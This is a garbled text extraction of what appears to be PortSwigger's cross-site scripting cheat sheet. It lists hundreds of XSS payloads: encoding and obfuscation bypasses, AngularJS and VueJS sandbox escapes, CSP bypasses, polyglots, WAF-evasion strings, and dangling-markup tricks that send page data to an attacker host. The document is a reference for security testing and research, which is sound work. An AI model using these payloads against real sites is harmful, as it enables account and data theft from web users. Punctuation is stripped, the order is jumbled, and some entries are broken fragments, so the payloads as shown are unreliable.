ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
